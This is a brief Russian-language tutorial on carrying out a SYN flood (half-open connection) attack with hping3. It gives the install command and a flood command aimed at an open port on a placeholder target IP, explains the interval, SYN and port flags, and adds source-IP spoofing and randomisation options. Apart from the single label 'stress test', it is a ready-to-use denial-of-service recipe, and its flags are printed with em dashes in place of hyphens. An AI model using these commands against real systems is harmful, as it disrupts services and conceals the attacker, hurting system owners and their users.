SYN FLOOD АТАКА
Маленький и простой мануал, о том, как реализовать SYN flood атаку (Half-open connection).
Для начала установим hping
1
|
apt—get install hping3
|
после того, как hping был установлен, запустим генерацию SYN пакетов.
1
|
hping3 —i u1 —S —p 80 xxx.xxx.xxx.xxx
|
где 80 это открытый порт в нужной системе, а xxx.xxx.xxx.xxx это IP или имя хоста.
Все. Стресс-тест начат.
Теперь разберем параметры, с которыми мы запустили hping
1
|
—i
|
интервал посылки пакетов. буква u указывает, что интервал будет в микросекундах. u1 — 1 микросекунда.
1
|
—S
|
установить в пакете SYN флаг.
1
|
—p
|
на какой порт будем посылать пакеты.
Так же есть еще пара приятных параметров, но они скорее всего будут работать только если находимся в одной сети с проверяемым хостом:
1
|
—a
|
подменить (spoofing) IP отправителя.
1
|
—rand—source
|
тоже самое, что и -a, но IP каждого пакета будет произвольно меняться.